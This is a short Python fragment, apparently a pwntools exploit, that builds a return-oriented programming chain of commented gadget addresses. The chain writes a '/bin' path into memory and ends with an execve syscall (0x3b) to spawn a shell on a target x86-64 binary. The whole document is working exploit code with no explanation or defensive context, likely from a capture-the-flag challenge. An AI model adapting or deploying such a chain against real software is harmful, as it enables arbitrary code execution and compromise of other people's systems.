payload = p64(0x443221)
#0x443221: pop rbx ; retf
payload += p64(0x6e69622f)+p32(0x4011ad)+p32(0x33)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x491095)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x443221)
# 0x443221: pop rbx ; retf
payload += p64(0x68662f)+p32(0x4011ad)+p32(0x33)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x491099)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x42b42b)
# 0x42b42b: pop rsi ; retf
payload += p64(0x0)+p32(0x4083d8)+p32(0x33)
# 0x00000000004083d8: pop rax; ret; 
payload += p64(0x0)+p64(0x4442df)
# 0x00000000004442df: cdq; ret; 
payload += p64(0x4083d8)
# 0x00000000004083d8: pop rax; ret; 
payload += p64(0x491058)+p64(0x47292a)
# 0x000000000047292a: xchg edi, eax; ret; 
payload += p64(0x4083d8)
# 0x00000000004083d8: pop rax; ret; 
payload += p64(0x3b)+p64(0x420069)
# 0x0000000000420069: syscall; 
payload += b''
